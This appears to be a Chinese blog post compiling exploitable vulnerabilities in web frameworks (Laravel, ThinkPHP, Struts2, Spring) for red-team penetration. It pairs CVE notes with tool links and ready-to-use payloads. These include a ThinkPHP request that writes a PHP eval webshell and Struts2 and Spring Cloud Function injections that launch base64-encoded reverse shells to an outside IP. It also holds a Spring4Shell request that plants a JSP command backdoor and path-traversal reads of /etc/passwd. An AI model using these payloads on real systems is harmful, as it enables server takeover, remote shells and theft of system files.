2023年红队渗透-开发框架可利用漏洞汇总
1 Laravel
Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)。
1.1 CVE-2021-3129 RCE
影响版本:Laravel <= 8.4.2
工具地址:https://github.com/zhzyker/CVE-2021-3129
https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
2 Thinkphp
ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框架
2.1 Thinkphp-3.X RCE-6.X RCE
综合工具:武器库-Thinkphp专检(3-6版本)
直接使用小王子工具库中可一键出结果。
2.2 6.X lang RCE
复现文档:https://blog.csdn.net/m0_71518346/article/details/128360317
漏洞poc:
?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?=@eval($_REQUEST['x']);?>+/var/www/html/x.php
3 Struct2
Apache Struts2框架是一个使用JavaEE网络应用程序的Web框架。可能存在OGNL表达注入扩展,从而造成远程代码执行,风险极大。
3.1 struts2 代码执行 CVE-2020-17530
影响版本:Apache Struts 2.0.0 - 2.5.25
工具地址:https://github.com/YanMu2020/s2-062
复现示例:
python .\s2-062.py --url http://47.98.193.176:18588/ --cmd id
3.2 Struts2 代码执行 CVE-2021-31805
影响版本:Apache Struts 2.0.0 - 2.5.29
漏洞poc:
Post: /s2_062/index.actionname=(%23request.map%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b(%23request.map.setBean(%23request.get('struts.valueStack'))+%3d%3d+true).toString().substring(0,0)+%2b(%23request.map2%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b(%23request.map2.setBean(%23request.get('map').get('context'))+%3d%3d+true).toString().substring(0,0)+%2b(%23request.map3%3d%23%40org.apache.commons.collections.BeanMap%40{}).toString().substring(0,0)+%2b(%23request.map3.setBean(%23request.get('map2').get('memberAccess'))+%3d%3d+true).toString().substring(0,0)+%2b(%23request.get('map3').put('excludedPackageNames',%23%40org.apache.commons.collections.BeanMap%40{}.keySet())+%3d%3d+true).toString().substring(0,0)+%2b(%23request.get('map3').put('excludedClasses',%23%40org.apache.commons.collections.BeanMap%40{}.keySet())+%3d%3d+true).toString().substring(0,0)+%2b(%23application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'bash -c {echo,%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%30%4e%79%34%35%4e%43%34%79%4d%7a%59%75%4d%54%45%33%4c%7a%55%30%4e%54%51%67%4d%44%34%6d%4d%51%3d%3d}|{base64,-d}|{bash,-i}'}))
4 SpringBoot
4.1 Spring Boot 目录遍历 CVE-2021-21234
Spring-boot-actuator-logview 0.2.13之前版本存在路径遍历漏洞,攻击者可通过该缺陷读取系统任意文件。
复现文章:https://blog.csdn.net/weixin_43165012/article/details/121152482
漏洞poc:直接访问
http://47.98.193.176:8908/manage/log/view?filename=etc/passwd&base=../../../../../../http://127.0.0.1:8887/manage/log/view?filename=/windows/win.ini&base=../../../../../../../
4.2 Spring Cloud Function Spel表达式注入 CVE-2022-22963
Spring Cloud Function提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像Amazon AWS Lambda这样的 FaaS(函数即服务,function as a service)平台。
影响版本:3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
复现文章:https://developer.aliyun.com/article/1160011
漏洞poc:
POST:/functionRouterspring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}")
4.3 Spring Framework远程代码执行漏洞 CVE-2022-22965
Spring Framework是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为J2EE应用程序开发提供了一个好用的框架。
影响版本:
- Spring Framework < 5.3.18
- Spring Framework < 5.2.20
- Spring Framework 的衍生框架构建的网站或应用
- Spring Framework < 5.2.20
复现文章:https://www.csdn.net/article/2022-11-24/128026635
复现过程:
1 写后门tomcatwar.jsp
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1Host: localhost:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closesuffix: %>//c1: Runtimec2: <%DNT: 1
2 访问jsp触发后门
http://localhost:8080/tomcatwar.jsp?pwd=j&cmd=id
工具项目:https://github.com/BobTheShoplifter/Spring4Shell-PoC
工具示例:
python poc.py --url=http://192.168.44.131/
http://192.168.44.131/tomcatwar.jsp?pwd=j&cmd=whoami
4.4 Spring boot命令执行 CVE-2022-22947
Spring Cloud Gateway是Spring中的一个API网关。
复现文章:https://cloud.tencent.com/developer/article/2164533
影响版本:
- Spring Cloud Gateway 3.1.x < 3.1.1
- Spring Cloud Gateway 3.0.x < 3.0.7
- 其他旧的、不受支持的Spring Cloud Gateway 版本
- Spring Cloud Gateway 3.0.x < 3.0.7
2023年红队渗透-开发框架可利用漏洞汇总相关推荐
- 【愚公系列】2023年05月 网络安全高级班 040.WEB渗透与安全(红队渗透测试技术分类和工具箱)
文章目录 前言 一.红队渗透测试技术分类和工具箱 1.红队渗透测试技术分类 1.1 Web安全渗透 1.2 内网安全渗透 1.3 移动安全渗透 1.4 无线安全渗透 1.5 云安全渗透 2.红队渗透测 ...
- 【愚公系列】2023年05月 网络安全高级班 038.WEB渗透与安全(红队渗透测试入门指南)
文章目录 前言 一.背景 1.新型IT基础设施带来全新挑战,安全范畴持续在延伸 2.APT级攻击手段众多,网络空间安全威胁加剧 3.什么是APT攻击 4.传统安全技术与管理应对乏力,众多政企单位陷入困 ...
- 攻防演练-某地级市HW攻防测试演练红队渗透测试总结
某地级市HW攻防演练红队渗透测试总结 文章目录 某地级市HW攻防演练红队渗透测试总结 前言 一.对某目标攻击的复盘 1.Web打点 2.上免杀马反弹shell(Failed) 3.信息收集,数据库提权 ...
- 红蓝对抗-红队渗透下的入口权限快速获取
红队渗透下的入口权限快速获取 文章目录 红队渗透下的入口权限快速获取 前言 红队攻击流程概述 获取入口权限 利用常见组件的漏洞 高危漏洞的检测与攻击 POC的集成与自动化验证 POC bomber 前 ...
- 红队渗透工具库-忍者安全系统(NINJUTSU OS v3)系统安装
红队渗透工具库-忍者安全系统(NINJUTSU OS v3)系统安装 前言 将镜像下载好使用VM安装,我给该系统分配了70个G硬盘,6G内存 镜像下载链接:链接: https://pan.baidu. ...
- 【网络安全】手把手给大家演练红队渗透项目
简介 该项目是以伟大的詹姆斯邦德电影GoldenEye为主题创作的,目标是获取最底层的flag.txt文本信息,该项目作为OSCP考试培训必打的一个项目环境,该作者评定该环境为渗透中级水准难度.接下来 ...
- 红队渗透测试技术:如何通过鱼叉式网络钓鱼获得攻击机会?
关于红队在渗透测试中使用的网络钓鱼攻击的文章很多,不过大多数的介绍都是不完整的.在本文中,我们将对这个话题进行一次完整的梳理,包括域创建,制作网络钓鱼内容,绕过垃圾邮件过滤器和电子邮件网关,生成不可检 ...
- 红队渗透-window痕迹清除
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一.windows操作系统基础入门 二.windows渗透痕迹清除 1.为避免入侵操作行为被发现时,攻击者往往通过各种 ...
- 红队渗透笔记之红队前端语言基础
文章目录 HTML基础 HTML语法 常用标签介绍 <!DOCTYPE>标签 < head> 标签 < title> 标签 < body> 标签 < ...
- 红队渗透靶场之SickOs1.1
靶场考察知识 shellshock漏洞 shellshock即unix系统下的bash shell的一个漏洞, Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞, 向环境变量值内的 ...
最新文章
- 运行php能运行asp么,配置使web server即能运行asp又能运行PHP(不装Apache)
- Android SharedPreferences保存和读取对象
- netty系列之:使用UDP协议
- POJ3208-Apocalypse Someday【数位dp】
- 平面设计 前端_我如何在5个月内从平面设计师过渡到前端开发人员
- etabs数据_etabs使用经验
- echarts 三环圆环_echarts实现环形进度图
- 我和2000万人在B站刷凤凰传奇
- 海外ubuntu,lamp,ftp,phpmyadmin配置
- 通过curl访问openstack各服务
- eclipse 反编译插件 图文
- CMMI3级认证过程记录
- meson test 的 --test-args 参数
- 屏幕增强字段如何保存修改记录
- PTA——基础编程题 | 7-27 冒泡法排序 (20分)
- python分析:爬取《灵笼》这部国产动漫弹幕,分析词云!看看网友究竟在说啥?
- 白鹭引擎egert+PHP后端手游宠物小精灵题材源码
- 深入理解line-height和vertical-align
- 述职答辩提问环节一般可以问些什么_述职答辩前
- Servlet服务器端程序